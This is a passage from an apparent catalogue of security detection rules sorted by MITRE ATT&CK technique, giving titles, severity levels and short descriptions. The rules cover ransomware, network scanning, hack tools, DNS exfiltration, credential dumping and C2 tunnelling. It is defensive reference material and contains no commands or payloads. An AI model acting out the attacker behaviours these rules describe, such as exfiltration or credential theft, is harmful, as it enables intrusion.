  • OpenCanary - Telnet Login Attempt - Level: high
    Description: Detects instances where a Telnet service on an OpenCanary node has had a login attempt.
  • Remote Access Tool - Team Viewer Session Started On Linux Host - Level: low
    Description: Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
  • Remote Access Tool - Team Viewer Session Started On MacOS Host - Level: low
    Description: Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
  • External Remote RDP Logon from Public IP - Level: medium
    Description: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
  • External Remote SMB Logon from Public IP - Level: high
    Description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
  • Failed Logon From Public IP - Level: medium
    Description: Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
  • Unusual File Modification by dns.exe - Level: high
    Description: Detects an unexpected file being modified by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
  • Unusual File Deletion by Dns.exe - Level: high
    Description: Detects an unexpected file being deleted by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
  • Unusual Child Process of dns.exe - Level: high
    Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
  • Remote Access Tool - ScreenConnect Installation Execution - Level: medium
    Description: Detects ScreenConnect program starts that establish remote access to a system.
  • Remote Access Tool - Team Viewer Session Started On Windows Host - Level: low
    Description: Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
  • User Added to Remote Desktop Users Group - Level: high
    Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
  • Running Chrome VPN Extensions via the Registry 2 VPN Extension - Level: high
    Description: Detects the installation of two Chrome VPN extensions via the registry
attack.t1486 15
Show Rules (15)
  • Antivirus Ransomware Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
  • AWS EC2 Disable EBS Encryption - Level: medium
    Description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.
  • Microsoft 365 - Potential Ransomware Activity - Level: medium
    Description: Detects when Microsoft Cloud App Security reports that a user uploaded files to the cloud that might be infected with ransomware.
  • Suspicious Creation TXT File in User Desktop - Level: high
    Description: Detects ransomware creating a txt file on the user's Desktop
  • Suspicious Appended Extension - Level: medium
    Description: Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.
  • Load Of RstrtMgr.DLL By A Suspicious Process - Level: high
    Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.
  • Load Of RstrtMgr.DLL By An Uncommon Process - Level: low
    Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.
  • Portable Gpg.EXE Execution - Level: medium
    Description: Detects the execution of "gpg.exe" from an uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
  • Suspicious Reg Add BitLocker - Level: high
    Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
  • Renamed Gpg.EXE Execution - Level: high
    Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • LockerGoga Ransomware Activity - Level: critical
    Description: Detects LockerGoga ransomware activity via specific command line.
  • Potential Conti Ransomware Activity - Level: critical
    Description: Detects a specific command used by the Conti ransomware group
  • BlueSky Ransomware Artefacts - Level: high
    Description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.
  • Suspicious Multiple File Rename Or Delete Occurred - Level: medium
    Description: Detects multiple file rename or delete events occurring within a specified period of time by the same user (these events may signal ransomware activity).
attack.t1046 15
Show Rules (15)
  • Linux Network Service Scanning - Auditd - Level: low
    Description: Detects enumeration of local or remote network services.
  • Pnscan Binary Data Transmission Activity - Level: medium
    Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
  • Linux Network Service Scanning Tools Execution - Level: low
    Description: Detects execution of network scanning and reconnaissance tools. These tools can be used for the enumeration of local or remote network services for example.
  • MacOS Network Service Scanning - Level: low
    Description: Detects enumeration of local or remote network services.
  • Advanced IP Scanner - File Event - Level: medium
    Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
  • Python Initiated Connection - Level: medium
    Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usage of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • HackTool - winPEAS Execution - Level: high
    Description: WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
  • HackTool - WinPwn Execution - Level: high
    Description: Detects command line keywords indicative of potential usage of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • PUA - Advanced IP Scanner Execution - Level: medium
    Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
  • PUA - Advanced Port Scanner Execution - Level: medium
    Description: Detects the use of Advanced Port Scanner.
  • PUA - SoftPerfect Netscan Execution - Level: medium
    Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
  • PUA - Nmap/Zenmap Execution - Level: medium
    Description: Detects usage of nmap/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
  • Network Scans Count By Destination IP - Level: medium
    Description: Detects many failed connection attempts to different ports or hosts
  • Network Scans Count By Destination Port - Level: medium
    Description: Detects many failed connection attempts to different ports or hosts
attack.t1210 15
Show Rules (15)
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote code execution (RCE) as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Apache Threading Error - Level: medium
    Description: Detects an issue in apache logs that reports threading related errors
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln - Level: high
    Description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
  • Zerologon Exploitation Using Well-known Tools - Level: critical
    Description: This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname.
  • Potential RDP Exploit CVE-2019-0708 - Level: medium
    Description: Detects a suspicious error in the RDP protocol, potentially CVE-2019-0708
  • DNS Query Request By QuickAssist.EXE - Level: low
    Description: Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.
  • HackTool - SharpWSUS/WSUSpendu Execution - Level: high
    Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
  • Suspicious SysAidServer Child - Level: medium
    Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
  • Terminal Service Process Spawn - Level: high
    Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC - Level: high
    Description: Detects the execution of the commonly used ZeroLogon PoC executable.
  • Possible Exploitation of Exchange RCE CVE-2021-42321 - Level: high
    Description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321
  • Potential CVE-2023-46214 Exploitation Attempt - Level: medium
    Description: Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code - Level: high
    Description: Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
attack.s0029 14
Show Rules (14)
  • PsExec Tool Execution - Level: low
    Description: Detects PsExec service execution via default service image name
  • PsExec Service Start - Level: low
    Description: Detects a PsExec service start
  • HackTool Service Registration or Execution - Level: high
    Description: Detects installation or execution of services
  • PsExec Service Installation - Level: medium
    Description: Detects PsExec service installation and execution events
  • CSExec Service File Creation - Level: medium
    Description: Detects default CSExec service filename which indicates CSExec service installation and execution
  • RemCom Service File Creation - Level: medium
    Description: Detects default RemCom service filename which indicates RemCom service installation and execution
  • PsExec Service File Creation - Level: low
    Description: Detects default PsExec service filename which indicates PsExec service installation and execution
  • PSEXEC Remote Execution File Artefact - Level: high
    Description: Detects creation of the PSEXEC key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
  • PsExec Tool Execution From Suspicious Locations - PipeName - Level: medium
    Description: Detects PsExec default pipe creation where the image executed is located in a suspicious location, which could indicate that the tool is being used in an attack
  • PUA - NirCmd Execution - Level: medium
    Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
  • PUA - NirCmd Execution As LOCAL SYSTEM - Level: high
    Description: Detects the use of NirCmd tool for command execution as SYSTEM user
  • PUA - NSudo Execution - Level: high
    Description: Detects the use of NSudo tool for command execution
  • PUA - RunXCmd Execution - Level: high
    Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
  • PsExec Default Named Pipe - Level: low
    Description: Detects PsExec service default pipe creation
attack.t1102 13
Show Rules (13)
  • Suspicious Non-Browser Network Communication With Reddit API - Level: medium
    Description: Detects a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors
  • Communication To LocaltoNet Tunneling Service Initiated - Linux - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Network Connection Initiated To AzureWebsites.NET By Non-Browser Process - Level: medium
    Description: Detects an initiated network connection by a non-browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
  • New Connection Initiated To Potential Dead Drop Resolver Domain - Level: high
    Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legitimate popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc., in order to pass through undetected.
  • Suspicious Non-Browser Network Communication With Google API - Level: medium
    Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
  • Communication To LocaltoNet Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times it is a sign of either data exfiltration by malicious actors or additional downloads.
  • Potentially Suspicious Network Connection To Notion API - Level: low
    Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
  • Suspicious Non-Browser Network Communication With Telegram API - Level: medium
    Description: Detects a non-browser process interacting with the Telegram API which could indicate use of a covert C2
  • Cloudflared Tunnel Connections Cleanup - Level: medium
    Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to clean up tunnel connections.
  • Cloudflared Tunnel Execution - Level: medium
    Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
  • Suspicious Child Process Of Manage Engine ServiceDesk - Level: high
    Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
attack.t1485 13
Show Rules (13)
  • Run from a Zip File - Level: medium
    Description: Payloads may be compressed, archived, or encrypted in order to avoid detection
  • AWS EFS Fileshare Mount Modified or Deleted - Level: medium
    Description: Detects when an EFS fileshare mount is modified or deleted. An adversary could break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.
  • AWS EKS Cluster Created or Deleted - Level: low
    Description: Identifies when an EKS cluster is created or deleted.
  • Azure Device or Configuration Modified or Deleted - Level: medium
    Description: Identifies when a device or device configuration in Azure is modified or deleted.
  • Microsoft 365 - Unusual Volume of File Deletion - Level: medium
    Description: Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files.
  • Overwriting the File with Dev Zero or Null - Level: low
    Description: Detects overwriting (effectively wiping/deleting) of a file.
  • DD File Overwrite - Level: low
    Description: Detects potential overwriting and deletion of a file using DD.
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
  • Deleted Data Overwritten Via Cipher.EXE - Level: medium
    Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
  • Fsutil Suspicious Invocation - Level: high
    Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomware during an attack (as seen with NotPetya and others).
  • Renamed Sysinternals Sdelete Execution - Level: high
    Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
  • Potential File Overwrite Via Sysinternals SDelete - Level: high
    Description: Detects the use of SDelete to erase a file, not the free space
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
attack.t1053 13
Show Rules (13)
  • Abusing Windows Telemetry For Persistence - Registry - Level: high
    Description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
  • Remote Schedule Task Lateral Movement via ATSvc - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task via ATSvc
  • Remote Schedule Task Lateral Movement via ITaskSchedulerService - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task
  • Remote Schedule Task Lateral Movement via SASec - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task via SASec
  • Cisco Modify Configuration - Level: medium
    Description: Modifications to a config that will serve an adversary's impacts or persistence
  • Suspicious Scheduled Task Write to System32 Tasks - Level: high
    Description: Detects the creation of tasks from processes executed from suspicious locations
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
  • HackTool - SharPersist Execution - Level: high
    Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
  • Scheduled TaskCache Change by Uncommon Program - Level: high
    Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
  • Defrag Deactivation - Security - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • HAFNIUM Exchange Exploitation Activity - Level: critical
    Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  • Potential ACTINIUM Persistence Activity - Level: high
    Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
attack.t1556 13
  • AWS Identity Center Identity Provider Change - Level: high
    Description: Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.
  • Disabled MFA to Bypass Authentication Mechanisms - Level: medium
    Description: Detection for when multi-factor authentication has been disabled, which might indicate malicious activity to bypass authentication mechanisms.
  • CA Policy Removed by Non Approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes where a non-approved actor removed a CA policy.
  • CA Policy Updated by Non Approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes. Is the initiating actor approved to make changes? Review the modified properties and compare the "old" vs "new" value.
  • Certificate-Based Authentication Enabled - Level: medium
    Description: Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.
  • New Root Certificate Authority Added - Level: medium
    Description: Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.
  • Change to Authentication Method - Level: medium
    Description: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
  • User Added To Group With CA Policy Modification Access - Level: medium
    Description: Monitor and alert on group membership additions of groups that have CA policy modification access
  • User Removed From Group With CA Policy Modification Access - Level: medium
    Description: Monitor and alert on group membership removal of groups that have CA policy modification access
  • Github High Risk Configuration Disabled - Level: high
    Description: Detects when a user disables a critical security feature for an organization.
  • Disabling Multi Factor Authentication - Level: high
    Description: Detects disabling of Multi Factor Authentication.
  • Possible Shadow Credentials Added - Level: high
    Description: Detects possible addition of shadow credentials to an active directory object.
  • Directory Service Restore Mode(DSRM) Registry Value Tampering - Level: high
    Description: Detects changes to the "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an "Administrator" account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse the DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
attack.t1012 13
  • Azure AD Health Monitoring Agent Registry Keys Access - Level: medium
    Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of the Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
  • Azure AD Health Service Agents Registry Keys Access - Level: medium
    Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g. AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.
  • SAM Registry Hive Handle Request - Level: high
    Description: Detects handles requested to SAM registry hive
  • SysKey Registry Keys Access - Level: high
    Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low-level settings
  • Exports Critical Registry Keys To a File - Level: high
    Description: Detects the export of a critical Registry key to a file.
  • Exports Registry Key To a File - Level: low
    Description: Detects the export of the target Registry key to a file.
  • Potential Configuration And Service Reconnaissance Via Reg.EXE - Level: medium
    Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Remote Registry Management Using Reg Utility - Level: medium
    Description: Detects remote registry management using the REG utility from a non-admin workstation
  • Potential Registry Reconnaissance Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
attack.t1005 12
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • OpenCanary - SMB File Open Request - Level: high
    Description: Detects instances where an SMB service on an OpenCanary node has had a file open request.
  • AWS EC2 VM Export Failure - Level: low
    Description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
  • Cisco Collect Data - Level: low
    Description: Collect pertinent data from the configuration files
  • ADFS Database Named Pipe Connection By Uncommon Tool - Level: medium
    Description: Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings, which contain sensitive information used to sign SAML tokens.
  • Esentutl Steals Browser Information - Level: medium
    Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
  • Veeam Backup Database Suspicious Query - Level: medium
    Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
  • VeeamBackup Database Credentials Dump Via Sqlcmd.EXE - Level: high
    Description: Detects dump of credentials in VeeamBackup dbo
  • SQLite Chromium Profile Data DB Access - Level: high
    Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
  • SQLite Firefox Profile Data DB Access - Level: high
    Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
  • Potential Conti Ransomware Database Dumping Activity Via SQLCmd - Level: high
    Description: Detects a command used by Conti to dump databases
  • Potential Exfiltration of Compressed Files - Level: medium
    Description: This rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body
attack.t1543 12
  • Usage Of Malicious POORTRY Signed Driver - Level: high
    Description: Detects the load of the signed POORTRY driver used by UNC3944 as reported by Mandiant and SentinelOne.
  • Vulnerable Dell BIOS Update Driver Load - Level: high
    Description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
  • Vulnerable Lenovo Driver Load - Level: high
    Description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges
  • CodeIntegrity - Blocked Image/Driver Load For Policy Violation - Level: high
    Description: Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.
  • CodeIntegrity - Blocked Driver Load With Revoked Certificate - Level: high
    Description: Detects blocked load attempts of revoked drivers
  • Service Installed By Unusual Client - Security - Level: high
    Description: Detects a service installed by a client which has PID 0 or whose parent has PID 0
  • KrbRelayUp Service Installation - Level: high
    Description: Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)
  • Service Installed By Unusual Client - System - Level: high
    Description: Detects a service installed by a client which has PID 0 or whose parent has PID 0
  • PUA - System Informer Driver Load - Level: medium
    Description: Detects driver load of the System Informer tool
  • PUA - Process Hacker Driver Load - Level: high
    Description: Detects driver load of the Process Hacker tool
  • PUA - Process Hacker Execution - Level: medium
    Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
  • PUA - System Informer Execution - Level: medium
    Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
attack.t1048 12
  • Dnscat Execution - Level: critical
    Description: Detects execution of the Dnscat exfiltration tool
  • DNS TOR Proxies - Level: medium
    Description: Identifies IPs performing DNS lookups associated with common Tor proxies.
  • Tap Driver Installation - Security - Level: low
    Description: Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.
  • Tap Driver Installation - Level: medium
    Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
  • Powershell DNSExfiltration - Level: high
    Description: DNSExfiltrator allows for transferring (exfiltrating) a file over a DNS request covert channel
  • Data Export From MSSQL Table Via BCP.EXE - Level: medium
    Description: Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
  • Copy From Or To Admin Share Or Sysvol Folder - Level: medium
    Description: Detects a copy command or a copy utility execution to or from an admin share or remote SYSVOL folder
  • Suspicious Redirection to Local Admin Share - Level: high
    Description: Detects a suspicious output redirection to the local admin share; this technique is often found in malicious scripts or hacktool stagers
  • Tap Installer Execution - Level: medium
    Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
  • High DNS subdomain requests rate per domain - Level: high
    Description: Detects a high rate of unique Fully Qualified Domain Name (FQDN) requests per root domain (eTLD+1) in a short period of time
  • Large domain name request - Level: high
    Description: Detects large DNS domain names
  • Tap Driver Installation - Level: medium
    Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
attack.t1489 12
  • Stop Windows Service - Level: low
    Description: Detects a Windows service being stopped
  • Azure Application Deleted - Level: medium
    Description: Identifies when an application is deleted in Azure.
  • Application Uninstalled - Level: low
    Description: An application has been removed. Check if it is critical.
  • Important Scheduled Task Deleted - Level: high
    Description: Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
  • Stop Windows Service Via Net.EXE - Level: low
    Description: Detects the stopping of a Windows service via the "net" utility.
  • Stop Windows Service Via PowerShell Stop-Service - Level: low
    Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
  • Delete Important Scheduled Task - Level: high
    Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
  • Delete All Scheduled Tasks - Level: high
    Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
  • Disable Important Scheduled Task - Level: high
    Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
  • Stop Windows Service Via Sc.EXE - Level: low
    Description: Detects the stopping of a Windows service via the "sc.exe" utility
  • Suspicious Windows Service Tampering - Level: high
    Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc., as seen in some ransomware scripts
  • Process Terminated Via Taskkill - Level: low
    Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
attack.t1546 11
  • Suspicious Get-WmiObject - Level: low
    Description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers
  • New Outlook Macro Created - Level: medium
    Description: Detects the creation of a macro file for Outlook.
  • Suspicious Outlook Macro Created - Level: high
    Description: Detects the creation of a macro file for Outlook.
  • Suspicious Get-Variable.exe Creation - Level: high
    Description: Get-Variable is a valid PowerShell cmdlet, and WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for a Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
  • Control Panel Items - Level: high
    Description: Detects the malicious use of a control panel item
  • COM Hijack via Sdclt - Level: high
    Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting - Level: high
    Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
  • Outlook Macro Execution Without Warning Setting Enabled - Level: high
    Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
  • HAFNIUM Exchange Exploitation Activity - Level: critical
    Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  • SOURGUM Actor Behaviours - Level: high
    Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
  • MSSQL Extended Stored Procedure Backdoor Maggie - Level: high
    Description: This rule detects the execution of the extended stored procedure backdoor named Maggie in the context of Microsoft SQL Server
attack.t1021 11
  • Lateral Movement Indicator ConDrv - Level: low
    Description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post-compromise. The Account Name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context.
  • OpenCanary - FTP Login Attempt - Level: high
    Description: Detects instances where an FTP service on an OpenCanary node has had a login attempt.
  • OpenCanary - SMB File Open Request - Level: high
    Description: Detects instances where an SMB service on an OpenCanary node has had a file open request.
  • OpenCanary - SNMP OID Request - Level: high
    Description: Detects instances where an SNMP service on an OpenCanary node has had an OID request.
  • OpenCanary - SSH Login Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a login attempt.
  • OpenCanary - SSH New Connection Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
  • OpenCanary - VNC Connection Attempt - Level: high
